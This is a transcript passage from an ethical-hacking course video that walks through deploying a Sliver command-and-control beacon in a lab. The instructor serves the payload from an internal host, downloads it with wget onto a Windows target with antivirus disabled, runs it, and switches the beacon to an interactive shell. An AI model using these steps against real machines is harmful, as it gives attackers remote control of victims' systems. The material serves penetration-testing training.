From the course: Kali Linux for Advanced Pen Testing and Ethical Hacking

Unlock this course with a free trial

Join today to access over 25,300 courses taught by industry experts.

Implement a Sliver agent

Implement a Sliver agent

- [Instructor] I've set up a simple Python website on our Sliver server so that we can download the beacon into our Windows target. And note, we're running the server on port 8,000. I'm in a Windows server which is on my virtual box network, so it appears as an internal subnet. However, if an adversary can access it, they can still put it under command and control. We switched off Windows antivirus for the purpose of the exercise. So let's now download the beacon. We will wget http://192.168.1.42:8000. And we'll pick up /beacon.exe and save it in the file beacon.exe. Okay, and now let's run it. Beacon.exe. Back in the Sliver server, we can check for beacons. And we have a blue prompt which indicates we're in beacon context. And we find our beacon is active. Let's set our context to this beacon. Use 4a9aeecc. And we have a blue prompt which indicates we're in beacon context. We can now switch this beacon to an interactive shell if we want to run commands on the target. Interactive. And…

Contents